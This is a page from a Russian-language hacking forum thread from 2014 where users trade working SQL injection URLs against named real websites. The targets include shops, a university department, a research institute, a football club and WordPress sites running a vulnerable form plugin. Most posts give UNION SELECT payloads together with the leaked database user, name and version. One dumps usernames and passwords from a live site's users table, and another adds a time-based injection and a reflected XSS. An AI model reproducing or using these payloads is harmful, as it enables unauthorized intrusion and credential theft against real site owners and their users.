HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15861  
Старый 10.03.2014, 19:17
danil7493
Новичок
Регистрация: 24.07.2011
Сообщений: 23
С нами: 7791446

Репутация: 10
По умолчанию

http://www.autosystem.com.ua/news.php?id=-7+union+select+1,2,3,concat_ws(0x3a3a3a3a,user(),d atabase(),version()),5,6,7,8+--+

autosystem@web5.1.hosting.efort.com.ua::::autosyst em_nissan::::5.1.68-log
 
Ответить с цитированием

  #15862  
Старый 11.03.2014, 02:07
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

proskater.ru - Самый крупный в Раисие интернет скейтшоп.

ТИЦ 275

PR 3

Код:
POST http://www.proskater.ru/shopping_cart.php?action=update_product
DATA products_id[]=1029188{1}539'+benchmark(20000000,sha1(1))+'&cart_delete[]=1029188{1}539
Код:
Host IP:	89.108.91.9
Web Server: 	nginx/0.7.65
Powered-by: 	PHP/5.3.2-1ubuntu4.17
Current DB: 	db_proskater
Чтобы крутить надо быть залогиненым.
 
Ответить с цитированием

  #15863  
Старый 20.03.2014, 17:06
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Журнал "Родина"

Код:
http://www.istrodina.com/rodina_articul.php3?id=3014&n=142+union+select+1,2,version%28%29+--+
Версия: 4.0.27-log
 
Ответить с цитированием

  #15864  
Старый 22.03.2014, 00:27
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Arthur C Clarke Institute for Modern Technologies, Katubedda, Moratuwa

Код:
http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
 
Ответить с цитированием

  #15865  
Старый 26.03.2014, 22:44
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами: 7676246

Репутация: 94


По умолчанию

Цитата:
Сообщение от zipper_frz  
Тиц - 0, ПР - 2
http://www.right2lifelanka.org/new/newsview.php?id=138
Код:
http://www.right2lifelanka.org/new/newsview.php?id=-138'+union+select+1,2,concat(user(),database()),4,5,6,7,8+--+
r2llanka_user@localhostr2llanka_main

Цитата:
Сообщение от RoksHD  
Код:
http://www.southcrest.org/wp-content/plugins/formcraft/form.php?id=1%20and%20%201=1
Код:
http://legacyera.com/wp-content/plugins/formcraft/form.php?id=1%20and%20%201=1
Код:
http://legacyera.com/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11--
legacy_jordan@localhost:legacy_wp

Код:
http://www.southcrest.org/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11--
southcrestorg@joro.dreamhost.com:southcrest_org
 
Ответить с цитированием

  #15866  
Старый 30.03.2014, 17:13
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

ФК Локомотив Ташкент

Код:
http://lokomotiv.uz/news.php?id=-794+union+select+@@version,2,3,4,5,6,7,8,9,10,11,1  2,13,14,15,16,17,18,19,20,21,22--
 
Ответить с цитированием

  #15867  
Старый 06.04.2014, 01:39
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Не нашел названия скрипта партнерки и сайт производителя, но на иденичном коде есть крупные проекты:

скрипт: work-task-read.php

переменная:?adv=

запрос:

Код:
-158%27 union select 1,2,concat_ws%280x3a,id,username,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from tb_users+limit+1,1+--+
Зависимость: аккаунт в системе.

Живой пример:

_ttp://mvdbux.ru/work-task-read.php?adv=

-158%27%20union%20select%201,2,concat_ws%280x3a,id, username,password%29,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23%20from%20tb_users+limit+0 ,1+--+
 
Ответить с цитированием

  #15868  
Старый 06.04.2014, 13:20
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Код:
http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
 
Ответить с цитированием

  #15869  
Старый 08.04.2014, 12:50
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от unic0rn  
Код:
http://mfc.edu/event.php?id=-16%27+UNION+SELECT+1,concat_ws%280x3e3e,database%28%29,user%28%29%29,3,version%28%29,5,6,7,8+--+
DEPARTMENT OF FINANCIAL STUDIES UNIVERSITY OF DELHI, PR4
Может кому интересно будет, тут присутствует еще одна уязвимость - отраженная XSS:

Цитата:
Сообщение от None  
mfc.edu/event.php?id=-8' union select 1,concat_ws(0x3a,database
%2528
),user()),3,version(),5,6,7,8--
alert(/Antichat/)
 
Ответить с цитированием

  #15870  
Старый 11.04.2014, 09:13
Anat
Новичок
Регистрация: 03.10.2011
Сообщений: 6
С нами: 7689206

Репутация: 0
По умолчанию

Код HTML:
http://asia-moto.ru/content.php?id=-19+UNION+SELECT+1--
http://stpatsfc.com/news.php?id=-3045+UNION+SELECT+1--
http://naspschools.org/board/board.php?id=-12+UNION+SELECT+1,2,3,4,5,6,7--
http://grandsoleil.net/boat_shows.php?id=-113+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
http://www.udc-caraudio.com/news_detail.php?id=-74+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
http://listadotren.es/motor/series.php?id=/51
http://weddingawards.com.br/premiacao/jurado-descritivo.php?id=/17
http://www.couleursetnuances.com/realisation.php?id=-14 order/**/by/**/?--
http://kagakribet.com/humor.php?id=-147+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.